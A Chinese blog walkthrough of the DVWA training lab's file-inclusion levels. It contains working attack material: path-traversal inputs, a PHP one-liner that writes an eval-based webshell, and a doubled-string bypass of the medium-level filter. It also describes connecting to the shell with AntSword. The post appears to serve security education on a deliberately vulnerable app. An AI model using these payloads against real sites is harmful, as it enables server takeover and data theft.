DVWA靶场——File Inclusion(文件包含漏洞)

最新推荐文章于 2024-04-23 14:30:19 发布
最新推荐文章于 2024-04-23 14:30:19 发布
阅读量5.4k 收藏 62
点赞数 13
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/128724450
版权

1.文件包含漏洞

1.什么是文件包含?
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。

File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
require():可以包含文件,如果包含错了,直接报错并退出程序的执行
include():在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
require_once():与require类似,区别在于当重复调用同一文件时,程序只调用一次
include_once():与include类似,区别在于当重复调用同一文件时,程序只调用一次

类型:
本地文件包含漏洞与远程文件包含漏洞。
远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。

2.实验环境

1.在dvwa里第一次测试训练时,会在File Inclusion这里看到“The PHP function allow_url_include is not enabled”这个的报错提醒,这个提示告诉我们PHP函数allow_url_include还未启用.

2.在设置中找到对应版本,将其中allow_url_include打开。

 3.此时回去发现没有报错了。

 low

1.首先查看源码发现没有任何过滤。可以看出服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确实为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

2.点开file1.php和其他的只有page=后面的发生了变化,因此可以将page后的参数视为可控字段。

3.文件包含是在url通过GET传参的方式获取文件,我们用 / 查看一下上下级目录,发现可以直接获取服务器文件路径。

 输入?page=../../phpinfo.php 可以看到php的具体信息。

 4. 我们在C盘创建一个txt文档。

 在url里面尝试上传包含本地文件  C://h.txt

 成功输出k.txt文件内容 只有php文件会解析运行。其他的只会原封不动的输出出来。

利用漏洞

 1.新建 txt文件上传一句话木马,进入文件上传File Upload,进行木马文件上传。

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?>

改h.txt文件后缀为.php 。

 2将其上传,并复制下路径。

 3. 复制链接 ../../hackable/uploads/pp.php到文件包含,发现没有报错,文件解析成功。

 4.根据路径到dvwa的文件包括目录,发现生成了shell.php文件。

 5.打开蚁剑,添加链接,把地址带有木马shell.php的链接复制过来,密码就是我们木马post里面写的的密码pass,直接连接。

 medium

<?php
 
// The page we wish to display
$file = $_GET[ 'page' ];
 
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
 
?>

发现使用str_replace对http://,https:// 替换成空,对于str_replace函数进行的过滤,可以使用双写进行绕过。

httphttp://://

?page=HttHttp://p://test1/h.txt

 high

<?php
 
// The page we wish to display
$file = $_GET[ 'page' ];
 
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
 
?>

fnmatch() 函数根据指定的模式来匹配文件名或字符串。

源码中限制了文件名来防止恶意文件包含,并且!fnmatch( "file*", $file )代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件,这样我们就远程访问不了了。

注意:file:///后面一定是绝对路径

小小邵同学
关注
  • 13
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA靶场环境搭建-dvwa.rar
10-15
DVWA靶场环境文件
DVWA靶场,集成了owasp top 10漏洞
03-28
DVWA靶场,集成了owasp top 10漏洞,可以在这里面进行学习漏洞原理、利用和危害
dvwa——文件包含漏洞
GZY0601的博客
09-19 175
昨天把文件上传的漏洞给讲了,但是最后的high的图片马就需要的文件包含漏洞,今天就来补一下文件包含漏洞文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。ok,到这里我们就把文件包含漏洞的三关给解决了,这个漏洞还是比较好理解的,算是很基础的一个漏洞。好啦,以上内容为我个人理解,不喜勿喷,如有写错欢迎指出。
DVWA靶场全解析(新手向)
LS_Sy的博客
02-18 956
我们直接在输入栏内随便填写数据,之后使用bp进行抓包抓到包后发送到instruder模块进行爆破,由于需要同时爆破用户名和密码两个字段,所以我们选择集束炸弹模式设置好字典后开始爆破,最后根据响应头的不同得到用户名和密码。
DVWA靶场源码分享
12-11
学习使用,大家一起进步,此资源是为了无法在github上临时下载的同学分享,以备用,不需要积分,如果被调整了积分请联系UP主
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
DVWA文件包含报错The PHP function allow_url_include is not enabled.的解决方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-13 8288
解决方法前言一、修改php配置文件二、重启mysql和apache服务 前言     打开File Inclusion,发现红色报错内容 The PHP function allow_url_include is not enabled.(PHP函数allow_url_include未启用)。 一、修改php配置文件     /etc/php/7.4/apache2/ 文件夹 cd /etc/php/7.4/apache2/
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
关于DVWA靶场File Inclusion中出现The PHP function allow_url_include is not enabled解决办法
Richard_qi的博客
12-27 3936
dvwa里测试训练时,肯定会在File Inclusion这里看到The PHP function allow_url_include is not enabled这个万恶红色的报错提醒,这个提示告诉我们PHP函数allow_url_include还未启用. 这时我们可以在WWW里的dvwa文件里找到php.ini文件 点击php.ini会出现如下: 看到这个是不是有点蒙圈啦,这不已经是开...
DVWA文件包含漏洞
weixin_56306210的博客
05-11 1425
DVWA文件包含漏洞
文件包含漏洞DVWA靶场文件包含漏洞详解)
tmzy1的博客
03-25 516
浏览器中运行此日志文件,即可执行插入的PHP代码。注意:若是一句话代码,就可以控制此服务器了。查看日志文件已记录此条信息。1、文件包含漏洞形成原因。2、文件包含漏洞的分类。3、PHP包含日志文件。
DVWA-2.0.1
09-23
在Github下载的DVWA 2.0.1,资源github上可找,如果所需下载积分超过1,那没必要。。。。.。。。。。。。
DVWA-master.zip
01-04
DVWA-master.zip
DVWA Installation
08-15
DVWA all package. DVWA-master.zip
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂中为师生的安全性教学提供便利。DVWA是一个RandomStorm开源项目,了解更多关于RandomStorm开源项目可以访问 http://www.randomstorm.com。DVWA项目开始于2008年12月,并逐渐受到欢迎。 现在,全世界有成千上万的安全专业人员,学生和教师正在使用它。 DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA靶场环境依赖文件
10-11
该文件来着官网下载,需要的uu可以下载,方便DVWA靶场环境搭建
vue2 顶象 安全 验证码的使用
lele66688888的博客
04-23 319
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。
RTU遥测终端为城市排水安全保驾护航!
最新发布
mantoo2014的博客
04-23 473
漫途多参数遥测终端MTW46-10-4A与低功耗遥测终端M4315,能够实时在线监测城市下水管道、涵洞、水浸点及河道的水位状况,同时精准采集水位、流量、流速和水质等数据。一旦监测到险情,平台会通过手机APP、短信通知以及现场声光报警器等多种方式,向城市管理者发出预警,从而有效预防和应对各类排水问题,确保城市排水系统的安全、稳定运行。漫途低功耗远程采集终端M4315是一款实现数据采集、远程传输、远程运维的智能设备,具有功耗低、体积小巧、盲区小、安装便捷等特点,适用于地下管网、雨水井等特殊环境的工业级设备。
dvwa文件包含初级
09-01
要进行dvwa文件包含的初级攻击,首先需要下载并解压dvwa文件包,其中包含了phpstudy_x64_8.1.1.3和DVWA-master。在DVWA页面中,使用root作为用户名,123456作为密码进行登录。 在进行文件包含攻击之前,需要了解代码中的漏洞。从低级别的代码中可以看出,服务端对上传的page参数没有进行任何过滤。接下来,使用burpsuit工具进行抓包。 首先尝试包含一个本地不存在的文件,此时会出现报错信息。从报错信息中我们可以得知,该代码使用了include函数,并暴露了包含函数文件的位置。同时,报错信息也显示没有找到指定的文件。 针对dvwa文件包含攻击的初级级别,以下是修复建议: 1. 建议使用白名单来判断文件类型,可以结合MIME Type、后缀检查、文件内容检查等方式进行判断。 2. 使用随机数和时间戳来改写文件名和文件路径,这样可以提高安全性,防止攻击者通过文件包含漏洞执行恶意代码。 3. 单独设置文件服务器域名,以限制文件的访问范围,增加安全性。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [PHP及DVWA文件包](https://download.csdn.net/download/qq_51311067/86264360)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [DVWA通关详解初级](https://blog.csdn.net/weixin_44831109/article/details/114898395)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值